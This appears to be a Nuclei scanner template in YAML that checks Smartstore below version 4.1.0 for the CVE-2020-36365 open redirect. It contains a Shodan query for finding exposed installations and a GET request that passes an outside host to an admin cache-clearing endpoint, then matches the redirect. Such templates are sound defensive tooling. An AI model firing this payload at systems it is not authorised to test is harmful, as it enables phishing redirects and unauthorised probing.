41 lines
1.7 KiB
YAML
41 lines
1.7 KiB
YAML
id: CVE-2020-36365
|
|
|
|
info:
|
|
name: Smartstore <4.1.0 - Open Redirect
|
|
author: 0x_Akoko
|
|
severity: medium
|
|
description: Smartstore (aka "SmartStoreNET") before 4.1.0 contains an open redirect vulnerability via CommonController.ClearCache, ClearDatabaseCache, RestartApplication, and ScheduleTaskController.Edit. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
|
|
remediation: |
|
|
Upgrade Smartstore to version 4.1.0 or later to fix the open redirect vulnerability.
|
|
reference:
|
|
- https://github.com/smartstore/SmartStoreNET/issues/2113
|
|
- https://github.com/smartstore/SmartStoreNET
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2020-36365
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 6.1
|
|
cve-id: CVE-2020-36365
|
|
cwe-id: CWE-601
|
|
epss-score: 0.00331
|
|
epss-percentile: 0.67845
|
|
cpe: cpe:2.3:a:smartstore:smartstorenet:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: smartstore
|
|
product: smartstorenet
|
|
shodan-query: http.html:'content="Smartstore'
|
|
tags: cve,cve2020,redirect,smartstore
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- '{{BaseURL}}/backend/admin/common/clearcache?previousUrl=http://www.interact.sh'
|
|
|
|
matchers:
|
|
- type: regex
|
|
part: header
|
|
regex:
|
|
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1
|
|
|
|
# digest: 4a0a0047304502200c65dab30d07362a76be8f51622dc3e23725432d0b023a09cc5bb0f1d9d0d352022100f0e58042ffde0b5cb1f5d181b5fe305a228fef75146fd46138cc668f992a3d36:922c64590222798bb761d5b6d8e72950
|